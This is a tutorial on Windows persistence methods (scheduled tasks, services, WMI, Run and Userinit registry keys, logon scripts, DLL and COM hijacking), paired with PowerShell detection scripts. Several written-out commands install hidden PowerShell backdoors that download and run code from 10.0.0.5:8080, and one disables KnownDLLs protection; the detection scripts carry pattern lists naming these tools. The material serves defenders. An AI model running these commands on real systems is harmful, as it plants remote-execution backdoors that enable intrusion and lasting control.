Common ways of maintaining privilege and access in Windows: backdoors and fileless backdoors


To protect a system from intrusion, we need to understand how attackers maintain privilege and access after the initial compromise.

Windows Task Scheduler

The Windows Task Scheduler can launch recurring tasks such as scripts or programs.

schtasks /create /sc minute /mo 1 /tn "Update Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://10.0.0.5:8080/fun.png\"\"\"))\""

Note: when this is executed from the command prompt, single quotes are replaced with double quotes, so three double quotes are used here instead.

This task runs the script every minute.
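From the defender's side, the same mechanism is easy to audit. The following PowerShell is an added example, not code from the original post: it lists every scheduled task whose action contains the flags used above (hidden window, -nop, a download cradle) and then pulls recent task-creation events (Security log Event ID 4698). The pattern list is an assumption about what is worth flagging and will need tuning per environment.

```powershell
# Added example (not from the original post): audit scheduled tasks whose action
# runs PowerShell with a hidden window, -nop, or a download cradle, then list
# recent task-creation events from the Security log.
$patterns = '-w hidden', '-nop', 'downloadstring', 'IEX', 'Invoke-Expression', 'FromBase64String', 'mshta', 'wscript'

function Get-SuspiciousScheduledTask {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            # ComHandler actions have no Execute/Arguments and simply produce no match
            $cmd = "$($action.Execute) $($action.Arguments)".Trim()
            foreach ($p in $patterns) {
                if ($cmd -match [regex]::Escape($p)) {
                    [PSCustomObject]@{
                        TaskName = $task.TaskName
                        TaskPath = $task.TaskPath
                        Author   = $task.Author
                        State    = $task.State
                        Command  = $cmd
                        Matched  = $p
                    }
                    break   # one hit per action is enough
                }
            }
        }
    }
}

Get-SuspiciousScheduledTask | Format-Table -AutoSize -Wrap

# Event 4698 ("A scheduled task was created") needs the "Audit Other Object Access
# Events" subcategory enabled and an elevated shell to read the Security log.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4698 } -MaxEvents 50 -ErrorAction SilentlyContinue |
    ForEach-Object {
        [PSCustomObject]@{
            Time     = $_.TimeCreated
            User     = $_.Properties[1].Value    # SubjectUserName
            TaskName = $_.Properties[4].Value    # TaskName
            Content  = $_.Properties[5].Value    # TaskContent: the task XML, including its Actions
        }
    } | Format-List
```

The task XML in the 4698 event is the most useful part for triage, since it records the full command line even if the task is later deleted.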


Autostart Service

sc create "Backdoor" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.5:8080/fun.png'))\""
REM Description for the service
sc description Backdoor "Backdoor Test"
REM Make it auto-start
sc config Backdoor start= auto
REM Start the service
net start Backdoor
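A service whose binary path is a command interpreter rather than a real service executable stands out on inspection. The following PowerShell is an added example (not from the original post) that lists such services and the Service Control Manager's installation events (System log Event ID 7045, which records the service name, image path and start type of every newly installed service). The substring list is an assumption and will produce some benign hits on hosts with legitimate script-based services.

```powershell
# Added example (not from the original post): find services whose binary path
# looks like an interpreter or launcher instead of a service executable, and
# list recent service installations from the System log.
$suspicious = 'powershell', 'cmd /c', 'cmd.exe /c', 'wscript', 'cscript', 'mshta', 'rundll32', 'downloadstring'

function Get-SuspiciousService {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        if (-not $path) { return }   # some kernel drivers have no PathName
        foreach ($s in $suspicious) {
            if ($path -match [regex]::Escape($s)) {
                [PSCustomObject]@{
                    Name      = $svc.Name
                    StartMode = $svc.StartMode
                    State     = $svc.State
                    Account   = $svc.StartName
                    PathName  = $path
                    Reason    = $s
                }
                break
            }
        }
    }
}

Get-SuspiciousService | Format-Table -AutoSize -Wrap

# 7045 "A service was installed in the system" is written by the Service Control
# Manager for every new service, regardless of audit policy.
Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045 } -MaxEvents 50 -ErrorAction SilentlyContinue |
    ForEach-Object {
        [PSCustomObject]@{
            Time        = $_.TimeCreated
            ServiceName = $_.Properties[0].Value
            ImagePath   = $_.Properties[1].Value
            ServiceType = $_.Properties[2].Value
            StartType   = $_.Properties[3].Value
            Account     = $_.Properties[4].Value
        }
    } | Format-Table -AutoSize -Wrap
```

Note that a service created this way never reports itself as started to the SCM, so it will typically sit in a stopped state after a 1053 timeout while the launched process keeps running; the ImagePath in 7045 is therefore more reliable than the service's current State.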

WMI

We can use the Persistence module from PowerSploit:

Import-Module .\Persistence\Persistence.psm1
$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '1 PM'
$UserOptions = New-UserPersistenceOption -Registry -AtLogon
Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose
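The -PermanentWMI option above creates a permanent WMI event subscription: an __EventFilter (the trigger), an __EventConsumer (the action) and a __FilterToConsumerBinding tying them together, all in the root\subscription namespace. The following PowerShell is an added example, not from the original post or from PowerSploit, that enumerates these triples and prints the consumer payload, plus the WMI-Activity operational log entries (Event ID 5861) that record permanent subscription creation. It assumes the CIM cmdlets (Windows PowerShell 3+), and handles both the CIM form of reference properties (objects) and the legacy string-path form.

```powershell
# Added example (not from the original post): enumerate permanent WMI event
# subscriptions and show what each one would execute.
$ns = 'root\subscription'

$filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
$consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer    # returns the concrete subclasses
$bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding

function Get-RefName($ref) {
    # CIM returns reference properties as key-only CimInstance objects; older
    # WMI code paths return object-path strings like __EventFilter.Name="x".
    if ($ref -is [Microsoft.Management.Infrastructure.CimInstance]) { return $ref.Name }
    return ($ref -replace '.*Name\s*=\s*"([^"]*)".*', '$1')
}

function Get-WmiPersistence {
    foreach ($b in $bindings) {
        $fName = Get-RefName $b.Filter
        $cName = Get-RefName $b.Consumer
        $f = $filters   | Where-Object Name -eq $fName
        $c = $consumers | Where-Object Name -eq $cName

        # CommandLineEventConsumer carries CommandLineTemplate; ActiveScriptEventConsumer carries ScriptText
        $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }

        [PSCustomObject]@{
            Filter        = $fName
            Query         = $f.Query
            Consumer      = $cName
            ConsumerClass = $c.CimClass.CimClassName
            Payload       = $payload
        }
    }
}

Get-WmiPersistence | Format-List

# 5861 in Microsoft-Windows-WMI-Activity/Operational logs the creation of a
# permanent FilterToConsumerBinding, including the consumer definition.
Get-WinEvent -LogName 'Microsoft-Windows-WMI-Activity/Operational' -FilterXPath '*[System[EventID=5861]]' -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Message | Format-List
```

On a clean workstation root\subscription usually holds no bindings at all (some management agents add their own), so any binding you did not put there deserves a look at its Query and Payload.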

Registry

Add the backdoor's path to an auto-run key so that it starts with the system.

Common auto-start keys

# Run Key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Winlogon\Userinit Key
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

(There are many other auto-start keys like these.)

The following command creates a fileless backdoor:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "KeyNameBackdoor" /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.5:8080/fun.png'))\"" /f

Logon Scripts Backdoor

Registry path:

HKEY_CURRENT_USER\Environment\

Create a string value named:

UserInitMprLogonScript

Set its data to the absolute path of the script:

C:\backdoor.bat

Userinit Fileless Backdoor

At logon, Winlogon runs the program(s) listed in this value, so programs can be added to or removed from the list.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
 "Userinit"="C:\Windows\system32\userinit.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.5:8080/fun.png'))\""
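The Registry, Logon Scripts and Userinit sections above all come down to a handful of registry locations, and a defender can dump them in one pass. The following PowerShell is an added example, not from the original post: it lists the Run/RunOnce values and flags interpreter-style commands, compares the Winlogon Userinit and Shell values against their defaults, and reports any UserInitMprLogonScript under HKCU\Environment. The "expected" Winlogon data are assumptions for a default 64-bit installation (C:\Windows, trailing comma included); compare against a known-good host of the same build before acting on a MODIFIED flag.

```powershell
# Added example (not from the original post): dump the auto-start locations
# covered above and flag entries that deviate from a clean system.
$pattern = 'powershell|-w hidden|-nop|downloadstring|IEX|mshta|wscript|cscript|rundll32|regsvr32'

# 1. Run / RunOnce keys: every value is a command launched at user logon.
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }          # PSPath, PSParentPath, ... are provider metadata
        $flag = if ("$($p.Value)" -match $pattern) { 'SUSPICIOUS' } else { '' }
        [PSCustomObject]@{ Location = $key; Name = $p.Name; Data = $p.Value; Flag = $flag }
    }
}

# 2. Winlogon: Userinit should name only userinit.exe, Shell only explorer.exe.
#    Assumption: default data for a C:\Windows install, trailing comma included.
$winlogon = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$expected = @{
    Userinit = 'C:\Windows\system32\userinit.exe,'
    Shell    = 'explorer.exe'
}
foreach ($name in $expected.Keys) {
    $actual = [string]$winlogon.$name
    $flag = if ($actual -ieq $expected[$name]) { '' } else { 'MODIFIED' }
    [PSCustomObject]@{ Location = 'HKLM Winlogon'; Name = $name; Data = $actual; Flag = $flag }
}

# 3. Per-user logon script: UserInitMprLogonScript is absent on a clean profile,
#    so any data at all is worth a look. Repeat under HKU:\<SID>\Environment
#    (after mounting the HKU drive) for other loaded profiles.
$envKey = Get-ItemProperty 'HKCU:\Environment' -ErrorAction SilentlyContinue
if ($envKey.UserInitMprLogonScript) {
    [PSCustomObject]@{ Location = 'HKCU:\Environment'; Name = 'UserInitMprLogonScript'; Data = $envKey.UserInitMprLogonScript; Flag = 'SUSPICIOUS' }
}
```

The Userinit check is deliberately an exact comparison rather than a pattern match: the technique above appends a second program after the legitimate userinit.exe, so anything other than the single default entry is the signal.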

Group Policy logon script

Run -> gpedit.msc -> User Configuration -> Scripts (Logon/Logoff)


Note: the full path must be used, e.g. “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”.
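Scripts configured through the Local Group Policy Editor are stored on disk, not only in the registry, so they can be audited without opening the GUI. The following PowerShell is an added example, not from the original post: it parses the local GPO script registrations in scripts.ini (batch/exe) and psscripts.ini (PowerShell) under %SystemRoot%\System32\GroupPolicy\User\Scripts, a hidden directory, and lists every file stored there. The INI layout it parses (NCmdLine / NParameters entries under [Logon] and [Logoff] sections) is the standard one; domain GPO scripts live in SYSVOL and are out of scope here.

```powershell
# Added example (not from the original post): list local Group Policy logon and
# logoff scripts by parsing the INI registrations and listing the script folder.
$scriptRoot = Join-Path $env:SystemRoot 'System32\GroupPolicy\User\Scripts'

function Get-GpoScriptEntries {
    param([string]$IniPath)
    # Entries look like "0CmdLine=foo.bat" and "0Parameters=" under [Logon] or [Logoff]
    $section = ''
    $entries = @{}
    foreach ($line in Get-Content -Path $IniPath -Force) {
        if ($line -match '^\[(.+)\]$') { $section = $Matches[1]; continue }
        if ($line -match '^(\d+)(CmdLine|Parameters)=(.*)$') {
            $id = "$section/$($Matches[1])"
            if (-not $entries.ContainsKey($id)) {
                $entries[$id] = @{ Section = $section; CmdLine = ''; Parameters = '' }
            }
            $entries[$id][$Matches[2]] = $Matches[3]
        }
    }
    foreach ($id in ($entries.Keys | Sort-Object)) {
        $e = $entries[$id]
        [PSCustomObject]@{
            Ini        = Split-Path $IniPath -Leaf
            Section    = $e.Section
            CmdLine    = $e.CmdLine
            Parameters = $e.Parameters
        }
    }
}

foreach ($ini in 'scripts.ini', 'psscripts.ini') {
    $path = Join-Path $scriptRoot $ini
    if (Test-Path $path) { Get-GpoScriptEntries -IniPath $path }
}

# Anything dropped into the scripts folder is worth listing too; -Force shows hidden files.
Get-ChildItem -Path $scriptRoot -Recurse -File -Force -ErrorAction SilentlyContinue |
    Select-Object FullName, Length, LastWriteTime
```

A CmdLine that points at powershell.exe with inline arguments, rather than at a script file under the Scripts folder, is the pattern described in this section.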

DLL Hijacking

If a process loads a DLL without an absolute path, Windows searches a set of folders in a defined order. If an attacker can write to one of those folders, a malicious DLL placed there is loaded and its code executes.

A common example is LPK.dll.

Windows 7 and later protect LPK.dll through the KnownDLLs list; for the hijack to work, LPK.dll has to be added to the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\

Create a string value named:

ExcludeFromKnownDlls

and set its data to:

LPK.dll

COM hijacking

The key is to build a suitable DLL and choose the right CLSID. By changing the CLSID's registry values, hijacks such as CAccPropServicesClass and MMDeviceEnumerator can be carried out; many system processes instantiate these objects at start-up. This can evade the auto-start checks in Autoruns.
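Both the DLL-hijacking and COM-hijacking sections leave a registry footprint that can be checked directly. The following PowerShell is an added example, not from the original post: it reports whether ExcludeFromKnownDlls has been set under Session Manager (it does not exist on a clean install, which is an assumption about the baseline), shows the protected KnownDLLs list for reference, and enumerates CLSIDs registered under HKCU\Software\Classes\CLSID with an InprocServer32, the per-user location that non-elevated processes consult before HKLM and the usual home of a COM hijack. For each such CLSID it shows whether an HKLM registration of the same CLSID exists (i.e. the HKCU entry shadows a system object) and whether the referenced DLL is present on disk.

```powershell
# Added example (not from the original post): check the registry locations the
# DLL-hijacking and COM-hijacking sections rely on.

# 1. KnownDLLs exclusion. ExcludeFromKnownDlls is absent by default (assumption:
#    clean install); any entry removes that DLL from KnownDLLs protection.
$sm = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
if ($sm.ExcludeFromKnownDlls) {
    "ExcludeFromKnownDlls is set: $($sm.ExcludeFromKnownDlls -join ', ')"
} else {
    "ExcludeFromKnownDlls is not set"
}
# The protected list itself, for reference.
(Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs').PSObject.Properties |
    Where-Object { $_.Name -notlike 'PS*' } | Select-Object Name, Value | Format-Table -AutoSize

# 2. Per-user COM registrations. HKCU\Software\Classes\CLSID wins over HKLM for
#    non-elevated processes, so an InprocServer32 here that shadows a system
#    CLSID is the classic hijack shape. (32-bit servers on a 64-bit host also
#    live under WOW6432Node, which this check does not cover.)
function Get-UserComServer {
    $hkcuClsid = 'HKCU:\Software\Classes\CLSID'
    if (-not (Test-Path $hkcuClsid)) { return }
    Get-ChildItem $hkcuClsid | ForEach-Object {
        $clsid  = $_.PSChildName
        $server = Get-ItemProperty -Path (Join-Path $_.PSPath 'InprocServer32') -ErrorAction SilentlyContinue
        if (-not $server) { return }
        $dll        = [string]$server.'(default)'
        $hklmServer = Get-ItemProperty -Path "HKLM:\SOFTWARE\Classes\CLSID\$clsid\InprocServer32" -ErrorAction SilentlyContinue
        $exists     = if ($dll) { Test-Path ([Environment]::ExpandEnvironmentVariables($dll)) } else { $false }
        [PSCustomObject]@{
            CLSID      = $clsid
            HKCU_Dll   = $dll
            HKLM_Dll   = [string]$hklmServer.'(default)'
            Shadows    = [bool]$hklmServer
            FileExists = $exists
        }
    }
}

Get-UserComServer | Format-Table -AutoSize -Wrap
```

Entries with Shadows set to True are the ones to examine first; a DLL path under a user-writable directory such as %APPDATA% strengthens the case, and FileExists False on a shadowing entry means the object will fail to load for that user, which is itself an anomaly worth explaining.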

Remote Control, Remote Access Trojan (RAT)

A RAT is a type of malicious program that includes a backdoor on the victim's device. It usually propagates through ordinary-looking content such as email attachments or game programs. Attackers use infected devices to spread the RAT further and eventually build a botnet.

To keep systems free of backdoors, we need to know how to investigate intrusions, keep systems up to date, and check server security regularly.
